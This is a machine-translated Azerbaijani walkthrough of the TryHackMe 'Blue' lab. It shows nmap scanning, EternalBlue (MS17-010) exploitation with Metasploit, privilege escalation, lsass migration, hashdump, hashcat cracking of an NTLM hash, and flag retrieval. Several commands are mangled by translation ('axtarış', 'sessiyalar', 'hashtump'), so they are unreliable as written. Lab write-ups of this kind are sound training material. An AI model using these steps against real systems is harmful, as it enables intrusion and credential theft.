Blackhat.az

Loading...

Blackhat.az

Register

CTF solutions - Cyber Security - 21 February 2021

TryHackMe : Blue

[Tapşırıq 1] Yenidənqurma

  1. Maşını skan edin.
nmap -Pn <ip>

nmap -A -T 5 <ip> -vv

Windows 7 maşındır.
 

2. 1000-dən aşağı port nömrəsi ilə neçə port açıqdır?
ANS: # 1-də

3. Bu maşın nəyə qarşı həssasdır? (Cavab: ms ?? – ???, ex: ms08–067 şəklində cavab)

nmap - skript vuln <ip> -vv

[Vəzifə 2] Giriş əldə edin

  1. Metasploit başlayın
msfconsole

2. Maşına qarşı işləyəcəyimiz istismar kodunu tapın. Kodun tam yolu nədir? (Məsələn: istismar / …… ..)

axtarış ms17-010

Maşın Windows 7 olduğu üçün “windows / smb / ms17_010_eternalblue” cəhd edək.

istifadə 2

3. Seçimləri göstərin və tələb olunan bir dəyəri təyin edin. Bu dəyərin adı nədir? (Göndərmə üçün bütün hədlər)

seçimləri göstər

RHOSTS <target ip> təyin edin

4. İstismar edin!

run

Uğur !!!

5. C istismar ki onfirm düzgün işləməsi edib. DOS qabığının görünməsi üçün enter düyməsini basmalı ola bilərsiniz. Bu qabığın arxa planı (CTRL + Z). Bu uğursuz olarsa, hədəf VM-i yenidən yükləməlisiniz. Hədəfi yenidən yükləmədən əvvəl yenidən işləməyə çalışın.

Enter düyməsini basın

[Vəzifə 3] Qiymətləndirin

  1. Əgər hələ etməmisinizsə, əvvəlcədən əldə edilmiş qabığın arxa planını (CTRL + Z) qeyd edin. Metasploitdə bir qabığın metrometr qabığına necə çevriləcəyini onlayn araşdırın. İstifadə edəcəyimiz poçt modulunun adı nədir? (Daha əvvəl seçdiyimiz istismara bənzər dəqiq yol)

Əvvəlcə metasploit-ə qayıdın

fon

Sessiyaları yoxlayın

sessiyalar

Sessiyaları yoxlayın

sessiyalar

2. Bunu seçin (MODULE_PATH istifadə edin). Seçimləri göstərin, hansı variantı dəyişdirməyimiz tələb olunur? (Bütün cavablar üçün cavablar)
ANS: 1 nömrədədir.

3. Lazımi seçimi seçin, hədəfinizi burada tapmaq üçün bütün iclasları sadalamağınıza ehtiyac ola bilər.

LPORT 1234 qurunSESSİYA 1 təyin edin

4. Çalış! Bu işə yaramırsa, əvvəlki tapşırığın istismarını bir daha tamamlamağa çalışın.

run

5. Metrometr qabığının konversiyası başa çatdıqdan sonra istifadə üçün həmin seansı seçin.

Sessiyaları yoxlayın

sessiyalar

iclaslar 2

6. NT Authority \ SYSTEM-ə keçdiyimizi doğrulayın. Bunu təsdiqləmək üçün getsystem tətbiq edin. ‘Shell’ əmri ilə dos shell açmaqdan və ‘whoami’ -dən istifadə etməkdən çəkinməyin. Bu, həqiqətən sistem olduğumuzu qayıtmalıdır. Ardından bu qabığın arxa planına keçin və yenidən istifadə üçün sayğac tərcüməçi seansımızı seçin.

sistem

shell

whoami

Meter tərcüməçisinə qayıtmaq üçün “ctrl + z” düymələrini basın


7. ‘ps’ əmri ilə işləyən bütün prosesləri sadalayın. Sistem olduğumuz müddətin olduğu demək deyil. Bu siyahının altına doğru NT AUTHORITY \ SYSTEM-də işləyən bir müddət tapın və proses id (sol sütun) yaz.

ps

8. Proses idinin əvvəlki addımda yazdığınız ‘köçür PROCESS_ID’ əmrini istifadə edərək bu əməliyyata keçin. Bu, bir neçə cəhd tələb edə bilər, miqrasiya prosesləri çox sabit deyil. Bu uğursuz olarsa, dönüşüm prosesini yenidən başlatmanız və ya maşını yenidən yükləməyiniz və yenidən başlamağınız lazım ola bilər. Bu baş verərsə, növbəti dəfə fərqli bir prosesi sınayın.

Lsass.exe köçürün

migrate 708

[Vəzifə 4] Çatlama

Varsayılan olmayan istifadəçinin şifrəsini atın və çatlayın!

  1. Yüksək ölçülmüş tərcüməçi qabığımızın içərisində ‘hashdump’ əmrini yerinə yetirin. Düzgün imtiyazlarımız olduğu müddətdə bu, bütün parolları maşına atacaq. Varsayılan olmayan istifadəçinin adı nədir?
hashtump

2. Bu parol hashini bir fayla kopyalayın və onu necə sındıracağınızı araşdırın. Qırılan parol nədir?
Dosyaya kopyalayın, NTLM qarışığıdır.

Çatlamaq üçün hash təşkil edin

Çatlamaq üçün hashcat istifadə edəcəyəm.
İstinad: https://github.com/frizb/Hashcat-Cheatsheet

hashcat -a 0 -m 1000 hashforcrack.txt rockyou.txt --force --username --show____________________________________________________________________izah etmək 
____________________________________________________________________“-A 0” orta hücum rejimi 0 
“-m 1000” NTLM hash 
“--force” deməkdir ki, maşınım yerli bir Intel OpenCL işləmə vaxtı deyil. Məcbur etmək lazımdır. 
"--username" faylıdakı istifadəçi adını görməməzlikdən 
gəlmək "--show" deməkdir ki, parol parolunu göstərməkdir


[Tapşırıq 5] Bayraqları tapın!
1. Bayraq1? (Yalnız bayraq məzmunu təqdim edin {CONTENTS})
Flag1 C: \

cat bayrağı1.txt

2. Bayraq2? * Səhvlər: Windows bu bayrağın yerini həqiqətən bəyənmir və bəzən silə bilər. Bəzi hallarda maşını ləğv etmək / yenidən başlatmaq və bu bayrağı tapmaq üçün istismarı təkrarlamaq lazım ola bilər. Bu nisbətən nadirdir, lakin ola bilər.
Flag2 “C: \ Windows \ System32 \ config” -də yerləşir.

cat bayrağı2.txt


3. bayraq3? 
Flag3 “C: \ Users \ Jon \ Documents” də yerləşir.
cat bayrağı3.txt